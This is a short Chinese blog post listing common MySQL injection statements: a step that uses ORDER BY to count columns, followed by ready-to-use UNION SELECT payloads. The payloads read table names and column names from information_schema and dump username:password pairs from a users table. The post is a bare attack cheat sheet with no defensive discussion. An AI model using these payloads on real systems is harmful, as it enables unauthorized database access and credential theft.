首页 > 数据库 >常用mysql注入语句

常用mysql注入语句

时间:2022-09-28 23:00:27浏览次数:54  
标签:语句 group union --+ mysql table schema select 注入

1、利用order by 判断字段数。

2、利用union select 联合查询,获取表名。

0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

3、利用union select 联合查询,获取字段名。

0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

4、利用union select 联合查询,获取字段值。

0' union select 1,group_concat(username,0x3a,password),3 from users--+

 



标签:语句,group,union,--+,mysql,table,schema,select,注入
From: https://blog.51cto.com/u_472169/5721171

相关文章

  • SQL语句‘order by’ 后面直接加数字的含义
    selectn表示select里面的第n个字段,整段sql的意义是:查询出来的结果,按照第N个字段排序......
  • MHA实现MySQL的高可用性
    MHA:MHAMasterHighAvailability对主节点进行监控,可实现自动故障转移至其它从节点;通过提升某一从节点为新的主节点,基于主从复制实现,还需要客户端配合实现。目前MHA主要......
  • mysql ascii()函数简介
    在mysql中ASCII()函数是把字符转换成ascii码值的函数.语法:ASCII(str)返回字符串str最左面字符的ASCII代码值,如果str是空字符串,返回0,如果str是NULL,返回NULL.举例:1.代码......
  • mysql substr()函数
    mysql中的substr()函数和hibernate的substr()参数都一样,就是含义有所不同。用法:substr(stringstring,numstart,numlength);string为字符串;start为起始位置;le......
  • centos7 安装 mysql5.7.25
    一、检查是否安装了mysql和mariadb,若已经安装就需要卸载。[root@localhost~]#rpm-qa|grep//查询出来已安装的mariadb[root@localhost~]#rpm-e--nodeps文件名......
  • docker搭建mysql
    下载mysql镜像[root@localhost~]#dockerpullmysql:5.5.59 创建mysql容器[root@localhost~]#dockerrun-itd--namemysql-p3309:3306--restart=always-eMYSQL_......
  • Can’t connect to local MySQL server through socket 原因解析
    在连接mysql的时,经常会出现以下错误提示:ERROR2002(HY000):Can'tconnecttolocalMySQLserverthroughsocket'/var/lib/mysql/mysql.sock' 出现此错误提示的原因一......
  • Python break 语句
    Pythonbreak语句,就像在C语言中,打破了最小封闭for或while循环。break语句用来终止循环语句,即循环条件没有False条件或者序列还没被完全递归完,也会停止执行循环语句。break语......
  • mysql写注释的几种方法
    MySQL的注释风格总的来说有三种、它们分别是:1、单行注释可以用"#"select1ascname;#thisisacomment+-------+|cname|+-------+|12、单行注释的第二种写法用......
  • Python continue 语句
    Pythoncontinue语句跳出本次循环,而break跳出整个循环。continue语句用来告诉Python跳过当前循环的剩余语句,然后继续进行下一轮循环。continue语句用在while和for循环中。......